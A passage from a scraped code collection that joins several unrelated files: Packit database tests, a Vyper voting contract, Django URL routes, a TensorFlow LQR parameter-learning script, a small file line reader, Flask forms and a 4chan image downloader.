\"f483003f13f0fee585f5cc0b970f4cd21eca7c9d\",\n \"target_repo\": \"nmstate/nmstate\",\n \"commit_sha\": \"f483003f13f0fee585f5cc0b970f4cd21eca7c9d\",\n \"github_login\": \"adwait-thattey\",\n },\n },\n {\n \"jobs\": {\"tests\": {\"success\": True, \"details\": {}}},\n \"event\": {\n \"trigger\": \"testing_farm_results\",\n \"created_at\": \"2020-03-25T16:56:39\",\n \"project_url\": \"https://github.com/psss/tmt.git\",\n \"git_ref\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n \"identifier\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n \"pipeline_id\": \"c9a88c3d-801f-44e4-a206-2e1b6081446a\",\n \"result\": \"passed\",\n \"environment\": \"Fedora-Cloud-Base-30-20200325.0.x86_64.qcow2\",\n \"message\": \"All tests passed\",\n \"log_url\": \"https://console-testing-farm.apps.ci.centos.org/pipeline\"\n \"/c9a88c3d-801f-44e4-a206-2e1b6081446a\",\n \"copr_repo_name\": \"packit/psss-tmt-178\",\n \"copr_chroot\": \"fedora-30-x86_64\",\n \"tests\": [\n {\"name\": \"/plans/smoke\", \"result\": \"passed\", \"log_url\": None},\n {\"name\": \"/plans/basic\", \"result\": \"passed\", \"log_url\": None},\n ],\n \"repo_name\": \"tmt\",\n \"repo_namespace\": \"psss\",\n \"commit_sha\": \"4c584245ef53062eb15afc7f8daa6433da0a95a7\",\n },\n },\n ]\n\n\n@pytest.fixture()\ndef multiple_task_results_entries(task_results):\n with get_sa_session() as session:\n session.query(TaskResultModel).delete()\n yield [\n TaskResultModel.add_task_result(\n task_id=\"ab1\", task_result_dict=task_results[0]\n ),\n TaskResultModel.add_task_result(\n task_id=\"ab2\", task_result_dict=task_results[1]\n ),\n ]\n clean_db()\n\n\ndef test_create_copr_build(a_copr_build):\n assert a_copr_build.pr_id == a_copr_build.pr.id\n assert a_copr_build.pr.pr_id == 1\n assert a_copr_build.build_id == \"123456\"\n assert a_copr_build.commit_sha == \"687abc76d67d\"\n assert a_copr_build.pr.project.namespace == \"nirvana\"\n assert a_copr_build.pr.project.repo_name == \"lithium\"\n assert a_copr_build.project_name == \"SomeUser-hello-world-9\"\n assert a_copr_build.owner == \"packit\"\n assert a_copr_build.web_url == \"https://copr.something.somewhere/123456\"\n assert a_copr_build.srpm_build.logs == \"asd\\nqwe\\n\"\n assert a_copr_build.target == TARGET\n assert a_copr_build.status == \"pending\"\n # Since datetime.utcnow() will return different results in every time its called,\n # we will check if a_copr_build has build_submitted_time value thats within the past hour\n time_last_hour = datetime.utcnow() - timedelta(hours=1)\n assert a_copr_build.build_submitted_time > time_last_hour\n\n\ndef test_get_copr_build(a_copr_build):\n assert a_copr_build.id\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.id == a_copr_build.id\n # let's make sure passing int works as well\n b = CoprBuild.get_by_build_id(int(a_copr_build.build_id), TARGET)\n assert b.id == a_copr_build.id\n b2 = CoprBuild.get_by_id(b.id)\n assert b2.id == a_copr_build.id\n\n\ndef test_copr_build_set_status(a_copr_build):\n assert a_copr_build.status == \"pending\"\n a_copr_build.set_status(\"awesome\")\n assert a_copr_build.status == \"awesome\"\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.status == \"awesome\"\n\n\ndef test_copr_build_set_build_logs_url(a_copr_build):\n url = \"https://copr.fp.o/logs/12456/build.log\"\n a_copr_build.set_build_logs_url(url)\n assert a_copr_build.build_logs_url == url\n b = CoprBuild.get_by_build_id(a_copr_build.build_id, TARGET)\n assert b.build_logs_url == url\n\n\ndef test_get_or_create_pr():\n clean_db()\n with get_sa_session() as session:\n try:\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"layla\"\n )\n\n assert session.query(PullRequest).count() == 1\n assert expected_pr.project_id == actual_pr.project_id\n\n expected_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n actual_pr = PullRequest.get_or_create(\n pr_id=42, namespace=\"clapton\", repo_name=\"cocaine\"\n )\n\n assert session.query(PullRequest).count() == 2\n assert expected_pr.project_id == actual_pr.project_id\n finally:\n clean_db()\n\n\ndef test_errors_while_doing_db():\n with get_sa_session() as session:\n try:\n try:\n PullRequest.get_or_create(pr_id=\"nope\", namespace=\"\", repo_name=False)\n except ProgrammingError:\n pass\n assert len(session.query(PullRequest).all()) == 0\n PullRequest.get_or_create(pr_id=111, namespace=\"asd\", repo_name=\"qwe\")\n assert len(session.query(PullRequest).all()) == 1\n finally:\n clean_db()\n\n\n# return all builds in table\ndef test_get_all(multiple_copr_builds):\n builds_list = CoprBuild.get_all()\n assert len(builds_list) == 3\n # we just wanna check if result is iterable\n # order doesn't matter, so all of them are set to pending in supplied data\n assert builds_list[1].status == \"pending\"\n\n\n# return all builds with given build_id\ndef test_get_all_build_id(multiple_copr_builds):\n builds_list = CoprBuild.get_all_by_build_id(str(123456))\n assert len(list(builds_list)) == 2\n # both should have the same project_name\n assert builds_list[1].project_name == builds_list[0].project_name\n assert builds_list[1].project_name == \"SomeUser-hello-world-9\"\n\n\n# returns the first build with given build id and target\ndef test_get_by_build_id(multiple_copr_builds):\n # these are not iterable and thus should be accessible directly\n build_a = CoprBuild.get_by_build_id(str(123456), \"fedora-42-x86_64\")\n assert build_a.project_name == \"SomeUser-hello-world-9\"\n assert build_a.target == \"fedora-42-x86_64\"\n build_b = CoprBuild.get_by_build_id(str(123456), \"fedora-43-x86_64\")\n assert build_b.project_name == \"SomeUser-hello-world-9\"\n assert build_b.target == \"fedora-43-x86_64\"\n build_c = CoprBuild.get_by_build_id(str(987654), \"fedora-43-x86_64\")\n assert build_c.project_name == \"SomeUser-random-text-7\"\n\n\ndef test_add_account(new_whitelist_entry):\n assert new_whitelist_entry.status == \"approved_manually\"\n assert new_whitelist_entry.account_name == \"Rayquaza\"\n\n\ndef test_get_account(multiple_whitelist_entries):\n assert Whitelist.get_account(\"Rayquaza\").status == \"approved_manually\"\n assert Whitelist.get_account(\"Rayquaza\").account_name == \"Rayquaza\"\n assert Whitelist.get_account(\"Deoxys\").status == \"waiting\"\n assert Whitelist.get_account(\"Deoxys\").account_name == \"Deoxys\"\n assert Whitelist.get_account(\"Solgaleo\").status == \"waiting\"\n assert Whitelist.get_account(\"Solgaleo\").account_name == \"Solgaleo\"\n\n\ndef test_get_accounts_by_status(multiple_whitelist_entries):\n a = Whitelist.get_accounts_by_status(\"waiting\")\n assert len(list(a)) == 2\n b = Whitelist.get_accounts_by_status(\"approved_manually\")\n assert len(list(b)) == 2\n\n\ndef test_remove_account(multiple_whitelist_entries):\n assert Whitelist.get_account(\"Rayquaza\").account_name == \"Rayquaza\"\n Whitelist.remove_account(\"Rayquaza\")\n assert Whitelist.get_account(\"Rayquaza\") is None\n\n\ndef test_get_task_results(multiple_task_results_entries):\n results = TaskResultModel.get_all()\n assert len(results) == 2\n assert results[0].task_id == \"ab1\"\n assert results[1].task_id == \"ab2\"\n\n\ndef test_get_task_result_by_id(multiple_task_results_entries, task_results):\n assert TaskResultModel.get_by_id(\"ab1\").jobs == task_results[0].get(\"jobs\")\n assert TaskResultModel.get_by_id(\"ab1\").event == task_results[0].get(\"event\")\n assert TaskResultModel.get_by_id(\"ab2\").jobs == task_results[1].get(\"jobs\")\n assert TaskResultModel.get_by_id(\"ab2\").event == task_results[1].get(\"event\")\n","sub_path":"tests_requre/test_db.py","file_name":"test_db.py","file_ext":"py","file_size_in_byte":14665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"508854838","text":"# Kitten Cutie Pageant\n#\n# An organizer creates the pageant, with a prize value (wei)\n# Next, they add_kitten() up to max_kitten kittens\n# They can also add_judge() any number of judges\n# Judges can vote() for either kitten\n# The organizer can close() the pageant\n# This sends the prize to the winner\n# ...or divides evenly in the case of a tie\n# ...or returns it to the organizer if there are < max_kitten kittens\n# At any time, anyone can get the index of the winning_kitten()\n# ...or the winner_name()\n# ...or the winner_owner()\n# ...but this is only guaranteed to be the final winner if the pageant is_closed()\n\n# Judges, mapped by address\njudges: public({\n # Has this judge voted yet?\n voted: bool,\n # Index of the kitten voted for\n vote: num\n}[address])\n\n# Kittens, mapped by index (0, 1)\n# Currently limited to 2 kittens\nkittens: public({\n # Short name, 32 bytes\n name: bytes32,\n # URL of kitten, up to 128 bytes\n url: bytes <= 128,\n # Number of votes for this kitten.\n vote_count: num,\n # Is this kitten registered yet?\n registered: bool,\n # Address of the owner of this kitten.\n owner: address\n}[num])\n\norganizer: public(address)\nnum_kittens: public(num)\nmax_kittens: public(num)\n\n# Setup global variables\n@public\ndef __init__():\n self.organizer = msg.sender\n\n self.num_kittens = 0\n self.max_kittens = 2\n\n# Computes the currently winning kitten\n@public\n@constant\ndef winning_kitten() -> num:\n winning_vote_count: num = 0\n winning_kitten: num = -1\n\n for k in range(2):\n if self.kittens[k].vote_count > winning_vote_count:\n winning_vote_count = self.kittens[k].vote_count\n winning_kitten = k\n\n return winning_kitten\n\n# Return the name of the (currently) winner\n@public\n@constant\ndef winner_name() -> bytes32:\n return self.kittens[self.winning_kitten()].name\n\n# Return the owner of the (currently) winner\n@public\n@constant\ndef winner_owner() -> address:\n return self.kittens[self.winning_kitten()].owner\n\n# Return URL of the (current) winner\n@public\n@constant\ndef winner_url() -> bytes <= 128:\n return self.kittens[self.winning_kitten()].url\n\n@public\ndef add_kitten(addr: address, name: bytes32, url: bytes <= 128) -> bytes32:\n # Kittens must be added by the organizer\n assert msg.sender == self.organizer\n # Only max_kittens allowed\n assert self.num_kittens < self.max_kittens\n\n self.kittens[self.num_kittens] = {\n name: name,\n url: url,\n vote_count: 0,\n registered: true,\n owner: addr\n }\n\n self.num_kittens += 1\n\n return name\n\n@public\ndef add_judge(judge: address):\n # Throws if the sender is not the organizer.\n assert msg.sender == self.organizer\n\n self.judges[judge] = {\n voted: false,\n vote: -1\n }\n\n@public\ndef vote(kitten: num):\n # Can't vote twice\n # Also, can't vote if not a judge\n assert not self.judges[msg.sender].voted\n # Can only vote on a registered kitten\n assert self.kittens[kitten].registered\n\n self.judges[msg.sender].vote = kitten\n self.judges[msg.sender].voted = true\n self.kittens[kitten].vote_count += 1\n","sub_path":"etherkitten/pageant.v.py","file_name":"pageant.v.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"618742408","text":"from django.conf.urls import patterns, include, url\n\nurlpatterns = patterns('',\n # url(r'(\\d+)/getKwarg', 'userProfile.views.userAddFilm'),\n url(r'm=(?P\\d+)&(?P\\d+)', 'userProfile.views.readMassages'),\n url(r'FriendIsTrue=(?P\\d+)', 'userProfile.views.freindsIsTrue'),\n url(r'friendsNotMyApplic', 'userProfile.views.userFriendNotMyApplic'),\n url(r'friendsMyApplic', 'userProfile.views.userFriendMyApplic'),\n url(r'(\\d+)/friends', 'userProfile.views.userFriendView'),\n url(r'(\\d+)/addfilms', 'userProfile.views.userAddFilm'),\n url(r'(\\d+)/lookfilms', 'userProfile.views.userLooks'),\n url(r'(\\d+)/likefilms', 'userProfile.views.userLikes'),\n url(r'(\\d+)/edit', 'userProfile.views.editUserProfile'),\n url(r'(\\d+)', 'userProfile.views.gUserProfile'),\n url(r'^logout', 'userProfile.views.logout'),\n url(r'^info', 'userProfile.views.userIndex'),\n # url(r'^blog/', include('blog.urls')),\n\n\n)\n\n\n","sub_path":"userProfile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"298602047","text":"import numpy as np\nimport cvxpy as cp\nimport tensorflow as tf\nfrom cvxpylayers.tensorflow.cvxpylayer import CvxpyLayer\nnp.seterr(all='raise')\nimport scipy.linalg \nimport matplotlib\n# matplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport ipdb\nfrom scipy.linalg import sqrtm\nfrom tqdm import trange\n# from time import gmtime, strftime\nimport datetime, os\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n # Restrict TensorFlow to only use the first GPU\n try:\n tf.config.experimental.set_visible_devices([], 'GPU')\n tf.config.experimental.set_virtual_device_configuration(\n gpus[0],\n [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=5120)])\n logical_gpus = tf.config.experimental.list_logical_devices('GPU')\n print(len(gpus), \"Physical GPUs,\", len(logical_gpus), \"Logical GPU\")\n except RuntimeError as e:\n # Visible devices must be set before GPUs have been initialized\n print(e)\n\n# # Set CPU as available physical device\n# cpus = tf.config.experimental.list_physical_devices(device_type='CPU')\n# tf.config.experimental.set_visible_devices(devices= cpus, device_type='CPU')\n\ndef LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n):\n Ptp1 = tf.identity(tf.linalg.diag(Qtrain_tf))\n K = []\n # Backward ricatti\n for t in range(T):\n Kt = -tf.linalg.inv(tf.linalg.diag(Rtrain_tf) + tf.transpose(B_tf)@Ptp1@B_tf)@tf.transpose(B_tf)@Ptp1@A_tf\n Pt = tf.linalg.diag(Qtrain_tf) + tf.transpose(A_tf)@tf.linalg.inv(tf.eye(n, dtype=tf.dtypes.float64) + Ptp1@B_tf@tf.linalg.inv(tf.linalg.diag(Rtrain_tf))@tf.transpose(B_tf))@Ptp1@A_tf\n Ptp1 = tf.identity(Pt)\n K.append(Kt)\n \n # x = []\n # x.append(x0)\n # u = []\n # for t in range(T):\n # u.append( K[T-1-t]@(x[t]-xf_tf) )\n # x.append( A_tf@x[t] + B_tf@u[t] )\n return K\n\n\ndef evaluate(train_xinit, expert_traj, A_tf, B_tf, K_lqr, xf_tf, T, n, m):\n\n u_star = expert_traj[n:, :]\n x_star = expert_traj[:n, :]\n\n u_sys = []\n x_sys = []\n x_sys.append(train_xinit)\n u_lqr = []\n x_lqr = []\n x_lqr.append(train_xinit)\n for i in range(T):\n u_sys.append( K_lqr[T-1-i]@(tf.expand_dims(expert_traj[:n, i], axis = 1)- xf_tf) )\n u_lqr.append( K_lqr[T-1-i]@(x_lqr[i] - xf_tf) )\n x_lqr.append( A_tf@x_lqr[i] + B_tf@u_lqr[i] )\n x_sys.append( A_tf@tf.expand_dims(x_star[:, i], axis = 1) + B_tf@tf.expand_dims(u_star[:, i], axis = 1) )\n\n u_lqr = tf.concat([tf.concat(u_lqr, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n u_sys = tf.concat([tf.concat(u_sys, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n x_lqr = tf.concat(x_lqr, axis = 1)\n x_sys = tf.concat(x_sys, axis = 1)\n\n # cost = tf.reduce_sum( tf.square(tf.subtract(x_star, x_lqr))) + tf.reduce_sum( tf.square(tf.subtract(u_star, u_lqr)) )\n # cost = tf.reduce_sum( tf.square(tf.subtract(u_star, u_sys)))\n cost = tf.reduce_sum( tf.square(tf.subtract(u_star, u_sys)))\n cost_sysID = tf.reduce_sum( tf.square(tf.subtract(x_star, x_sys)))\n # cost = cost/(u_star.shape[1])#/(x_star.shape[0])\n # print(tape.gradient(cost, Kt))\n # print(tape.gradient(cost, xf_tf))\n # ipdb.set_trace()\n return cost, cost_sysID\n\ndef eval_loss(train_xinit, expert_trajs, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m):\n B_tf = massinv_tf*Bpart_tf\n vel_fG = tf.zeros((int(n/2),1), dtype=tf.dtypes.float64)\n K_lqr = LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n)\n N = train_xinit.shape[0]\n outputs = [evaluate(train_xinit[i], expert_trajs[i], A_tf, B_tf, K_lqr, tf.concat([xf_tf, vel_fG], axis=0), T, n, m)\n for i in range(N)]\n loss = sum([out[0] for out in outputs]) / N\n loss_sysID = sum([out[1] for out in outputs]) / N\n return loss, loss_sysID\n\ndef train(train_xinit, expert_trajs, lr, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m):\n optimizer = tf.keras.optimizers.Adam(learning_rate=lr, beta_1=0.9, beta_2=0.999, epsilon=1e-04)\n\n variables = [massinv_tf, Qtrain_tf, xf_tf, Rtrain_tf]\n variables_sysID = [massinv_tf]\n # variables = [massinv_tf, Qtrain_tf, Rtrain_tf]\n # variables = [massinv_tf]\n with tf.GradientTape(persistent=True) as tape:\n loss, loss_sysID = eval_loss(train_xinit, expert_trajs, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m)\n \n gradients = tape.gradient(loss, variables)\n gradients_sysID = tape.gradient(loss_sysID, variables_sysID)\n\n optimizer.apply_gradients(zip(gradients, variables))\n optimizer.apply_gradients(zip(gradients_sysID, variables_sysID))\n return loss, loss_sysID, variables\n\ndef main():\n n = 2\n m = 1\n T = 100\n dt = 0.1\n mass = 0.5\n n_trajs = 5000\n train_num = n_trajs\n batch_size = 20\n lr = 0.001\n\n x0 = np.array([-1, 0.000001])\n A = np.array([[1, dt],[0,1]])\n B = np.array([[0],[dt/mass]])\n Bpart = np.array([[0],[dt]])\n Q = 2*np.eye(n)\n R = 2*np.eye(m)\n xf = np.array([[2],[0]])\n\n # Learning the LQR model:\n data = np.load('../data/expert_LQR_5000.npz')\n train_xinit = data['xinit']\n expert_trajs = data['expert_trajs']\n train_xinit_tf = tf.constant(train_xinit, dtype=tf.dtypes.float64)\n \n # Initialize training variables\n massinv_tf = tf.Variable( tf.random.uniform([1], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n Qtrain_tf = tf.Variable( tf.random.uniform([n], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n xf_tf = tf.Variable( tf.random.uniform((int(n/2),1), minval=0, maxval=2, dtype=tf.dtypes.float64) )\n Rtrain_tf = tf.Variable( tf.random.uniform([m], minval=0, maxval=2, dtype=tf.dtypes.float64) )\n\n A_tf = tf.constant(A)\n Bpart_tf = tf.Variable(Bpart)\n\n # massinv_tf = tf.Variable( np.array([1/mass]), dtype=tf.dtypes.float64 )\n # Qtrain_tf = tf.Variable( np.diag(Q), dtype=tf.dtypes.float64 )\n # xf_tf = tf.Variable( xf[0,0].reshape(1,1), dtype=tf.dtypes.float64 )\n # Rtrain_tf = tf.Variable( np.diag(R), dtype=tf.dtypes.float64 )\n\n #-------Using self-implementation of LQR-----------------\n # K_lqr = LQR_tf(massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n)\n\n \n\n #-----------TRAIN------------------\n train_loss_list = []\n tag = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n checkpoint_path = '../outs/LearnK_LQR_self/' + tag + '/saved_model/'\n plot_dir = '../outs/LearnK_LQR_self/' + tag + '/media'\n train_log_dir = '../logs/LearnK_LQR_self/' + tag\n os.makedirs(plot_dir)\n os.makedirs(checkpoint_path)\n checkpoint = tf.train.Checkpoint(massinv_tf=massinv_tf, Qtrain_tf=Qtrain_tf, xf_tf = xf_tf, Rtrain_tf = Rtrain_tf)\n ckpt_manager = tf.train.CheckpointManager(checkpoint, checkpoint_path, max_to_keep=5)\n\n train_summary_writer = tf.summary.create_file_writer(train_log_dir)\n i = 0\n for e in trange(20):\n train_loss = 0\n tf.random.shuffle(train_xinit)\n # lr = lr/(e+1)\n for b in trange(0, train_num, batch_size):\n i+=1\n loss, loss_sysID, variables = train(train_xinit_tf[b:min(b + batch_size, train_num)], expert_trajs[b:min(b + batch_size, train_num)], lr, massinv_tf, A_tf, Bpart_tf, Qtrain_tf, xf_tf, Rtrain_tf, T, n, m)\n massinv_tf.assign(tf.abs(variables[0]))\n Qtrain_tf.assign(tf.abs(variables[1]))\n xf_tf.assign(variables[2])\n Rtrain_tf.assign(tf.abs(variables[3]))\n # print(\"Train BATCH : \", b, \"loss : \", loss)\n train_loss += loss\n with train_summary_writer.as_default():\n tf.summary.scalar('loss', loss, step=i)\n tf.summary.scalar('loss sysID', loss_sysID, step=i)\n tf.summary.scalar('Mass/learned', massinv_tf[0], step=i)\n tf.summary.scalar('Mass/Ground_truth', (1/mass), step=i)\n\n tf.summary.scalar('Q_1/learned', Qtrain_tf[0], step=i)\n tf.summary.scalar('Q_2/learned', Qtrain_tf[1], step=i)\n tf.summary.scalar('Q_1/Ground_truth', Q[0,0], step=i)\n tf.summary.scalar('Q_2/Ground_truth', Q[1,1], step=i)\n\n tf.summary.scalar('xf_1/learned', xf_tf[0,0], step=i)\n # tf.summary.scalar('xf_2/learned', xf_tf[1,0], step=i)\n tf.summary.scalar('xf_1/Ground_truth', xf[0,0], step=i)\n # tf.summary.scalar('xf_2/Ground_truth', xf[1,0], step=i)\n\n tf.summary.scalar('R/learned', Rtrain_tf[0], step=i)\n tf.summary.scalar('R/Ground_truth', R[0,0], step=i)\n if i%20 == 1:\n ckpt_manager.save()\n test_indx = 10\n vel_fG = tf.zeros((int(n/2),1), dtype=tf.dtypes.float64)\n B_tf = massinv_tf*Bpart_tf\n K_lqr = LQR_tf(A_tf, B_tf, Qtrain_tf, Rtrain_tf, T, n)\n u_sys = []\n u_lqr = []\n x_lqr = []\n x_lqr.append(train_xinit_tf[test_indx])\n xf_full = tf.concat([xf_tf, vel_fG], axis=0)\n for t in range(T):\n u_sys.append( K_lqr[T-1-t]@(tf.expand_dims(expert_trajs[test_indx, :n, t], axis = 1) - xf_full) )\n u_lqr.append( K_lqr[T-1-t]@(x_lqr[t] - xf_full) )\n x_lqr.append( A_tf@x_lqr[t] + B_tf@u_lqr[t] )\n\n u_lqr = tf.concat([tf.concat(u_lqr, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n u_sys = tf.concat([tf.concat(u_sys, axis = 1), tf.zeros((m, 1), dtype=tf.dtypes.float64)], axis = 1)\n x_lqr = tf.concat(x_lqr, axis = 1)\n fig, axes = plt.subplots(2, 2, figsize=(15, 15))\n axes[0, 0].plot(expert_trajs[test_indx,2,:], label = 'u des')\n axes[0, 0].plot(u_sys[0,:], label = 'u pred sysID')\n axes[0, 0].set_xlabel('t')\n axes[0, 0].set_ylabel('u')\n axes[0, 0].legend()\n\n axes[0, 1].plot(expert_trajs[test_indx,0,:], label = 'data')\n axes[0, 1].plot(x_lqr[0,:], label = 'learned')\n axes[0, 1].set_title(\"Position\")\n axes[0, 1].set_xlabel('t')\n axes[0, 1].set_ylabel('x')\n axes[0, 1].legend()\n\n axes[1, 0].plot(expert_trajs[test_indx,1,:], label = 'data')\n axes[1, 0].plot(x_lqr[1,:], label = 'learned')\n axes[1, 0].set_title(\"Velocity\")\n axes[1, 0].set_xlabel('t')\n axes[1, 0].set_ylabel('xdot')\n\n axes[1, 1].plot(expert_trajs[test_indx,2,:], label = 'data')\n axes[1, 1].plot(u_lqr[0,:], label = 'learned')\n axes[1, 1].set_title(\"Control\")\n axes[1, 1].set_xlabel('t')\n axes[1, 1].set_ylabel('u')\n axes[1, 1].legend()\n\n plt.savefig(plot_dir + '/test%d.png'%i)\n plt.clf()\n plt.close()\n train_loss /= train_num\n train_loss_list.append(train_loss)\n print(\"epoch: {}, train loss: {:.3f}\".format(e+1, train_loss))\n\n # #------------PLOTTING---------------\n # q_lqr = [x_lqr[i][0,0] for i in range(T+1)]\n # qdot_lqr = [x_lqr[i][1,0] for i in range(T+1)]\n # u_lqr = [u_lqr[i][0,0] for i in range(T)]\n # plot_indx = 0\n # fig, axes = plt.subplots(2, 2, figsize=(10, 10))\n # axes[0, 0].plot(expert_trajs[plot_indx,0,:], expert_trajs[plot_indx,1,:], label = 'data')\n # axes[0, 0].plot(x[0,:], x[1,:], label = 'cvx')\n # axes[0, 0].plot(q_lqr, qdot_lqr, label = 'lqr')\n # axes[0, 0].set_title(\"Phase plot\")\n # axes[0, 0].set_xlabel('x')\n # axes[0, 0].set_ylabel('xdot')\n # axes[0, 0].legend()\n\n # axes[0, 1].plot(expert_trajs[plot_indx,0,:], label = 'data')\n # axes[0, 1].plot(x[0,:], label = 'cvx')\n # axes[0, 1].plot(q_lqr, label = 'lqr')\n # axes[0, 1].set_title(\"Position\")\n # axes[0, 1].set_xlabel('t')\n # axes[0, 1].set_ylabel('x')\n # # axes[0, 1].legend()\n\n # axes[1, 0].plot(expert_trajs[plot_indx,1,:], label = 'data')\n # axes[1, 0].plot(x[1,:], label = 'cvx')\n # axes[1, 0].plot(qdot_lqr, label = 'lqr')\n # axes[1, 0].set_title(\"Velocity\")\n # axes[1, 0].set_xlabel('t')\n # axes[1, 0].set_ylabel('xdot')\n\n # axes[1, 1].plot(expert_trajs[plot_indx,2,:], label = 'data')\n # axes[1, 1].plot(u[0,:], label = 'cvx')\n # axes[1, 1].plot(u_lqr, label = 'cvx')\n # axes[1, 1].set_title(\"Control\")\n # axes[1, 1].set_xlabel('t')\n # axes[1, 1].set_ylabel('u')\n # axes[1, 1].legend()\n # plt.show()\n # plt.savefig('lqr_self.png')\n\nif __name__ == '__main__':\n main()","sub_path":"notebooks/learnLQR_self.py","file_name":"learnLQR_self.py","file_ext":"py","file_size_in_byte":12671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"59656699","text":"#!/usr/bin/env python3.6\n# this is a file that prints a requested line of a requested filer\n\nimport os, argparse, sys\n\nparser = argparse.ArgumentParser(description='Read a line of a file')\nparser.add_argument('--filename', '-f', help='the file to read')\nparser.add_argument('--linenumber', '-l', type=int, help='the line number to read')\nparser.add_argument('--version', '-v', action='version', version='%(prog)s 2.0')\nargs = parser.parse_args()\n#file_name = input(\"What file would you like to read a line from? \").strip()\nfile_name = args.filename\n\n# see if file is in current directory\nfh = os.path.isfile(f'{file_name}')\ntry:\n f = open(f'{file_name}', 'r')\nexcept FileNotFoundError as f:\n print(f'\\tError: {f}')\n sys.exit(2)\nelse:\n fh = os.path.isfile(f'{file_name}')\n print(f'Working with file \"{file_name}\"')\n # check file length\n flen = len(open(f'{file_name}').readlines())\n file_length = flen - 1\n # get user input on what line they would like to read\n print(f'The file \"{file_name}\" has {file_length} lines')\n #line_number = int(input(f\"What line would you like to read from {file_name}? \"))\n line_number = args.linenumber\n # check if the line they want to read exists in file\n if line_number <= file_length:\n #print('You chose a valid number')\n arr = f.readlines()\n line = arr[line_number]\n print(f'Line {line_number} of \"{file_name}\" file says: {line}')\n else:\n print('The number you have me is too high')\n","sub_path":"python/handling_errors_when_files_dont_exist.py","file_name":"handling_errors_when_files_dont_exist.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"382071888","text":"import datetime\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField\nfrom wtforms.ext.sqlalchemy.fields import QuerySelectField\nfrom wtforms.fields.html5 import IntegerField, URLField, DateTimeField\nfrom wtforms.validators import DataRequired, Length, ValidationError, NumberRange, url\n\nfrom pat import Gender\nfrom pat.trainer.forms import specialization_query\n\n\ndef gender_query():\n return Gender.query\n\n\nclass CreateTrainingForm(FlaskForm):\n description = StringField('Description', validators=[DataRequired(), Length(min=5, max=1000)])\n place = URLField(validators=[url()])\n training_start = DateTimeField('Training start', validators=[DataRequired()])\n training_end = DateTimeField('Training end', validators=[DataRequired()])\n specialization = QuerySelectField('Specialization', query_factory=specialization_query,\n allow_blank=False, get_label='specialization')\n gender = QuerySelectField('Gender', query_factory=gender_query, allow_blank=False, get_label='gender')\n number = IntegerField('Nubmer of people', validators=[NumberRange(min=0, max=30)])\n submit = SubmitField('Create training')\n\n def validate_training_end(self, training_end):\n if self.training_end.data <= self.training_start.data:\n raise ValidationError('Training and must be > training start')\n else:\n return True\n\n def validate_training_start(self, training_start):\n a = datetime.datetime.strptime(str(self.training_start.data), \"%Y-%m-%d %H:%M:%S\")\n if a < datetime.datetime.now():\n raise ValidationError('You can bot create past event')\n else:\n return True\n","sub_path":"pat/training/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"1512760","text":"#!/usr/bin/python\n\nimport requests\nfrom lxml import html\nfrom io import open as iopen\nfrom urllib.parse import urlsplit\n\n\ndef requests_image(file_url):\n\tfile_name = urlsplit(file_url)[2].split('/')[-1]\n\timage = requests.get(file_url)\n\tif image.status_code == requests.codes.ok:\n\t\twith iopen(file_name, 'wb') as file:\n\t\t\tfile.write(image.content)\n\t\t\tprint(\"> Image {} downloaded ({}/{})\".format(file_name, index, len(images_links)))\n\n\nprint(\"\"\" \\n\n ██╗ ██╗ ██████╗██╗ ██╗ █████╗ ███╗ ██╗\n ██║ ██║██╔════╝██║ ██║██╔══██╗████╗ ██║\n ███████║██║ ███████║███████║██╔██╗ ██║\n ╚════██║██║ ██╔══██║██╔══██║██║╚██╗██║\n ██║╚██████╗██║ ██║██║ ██║██║ ╚████║\n ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═══╝\n\"\"\")\n\n\nthread_url = input(\"Insert Thread URL: \")\n\nthread = requests.get(thread_url)\nhtml = html.fromstring(thread.content)\nimages_links = html.xpath(\"//div[@class='board']//a[@class='fileThumb']/@href\")\n\nprint(\"\\n{} images found\".format(len(images_links)))\nprint(\"Download starting, please wait...\")\n\nindex = 0\nfor link in images_links:\n\tindex += 1\n\trequests_image(\"http:\" + str(link))\n\nprint(\"\\nSuccessfully downloaded {} images! 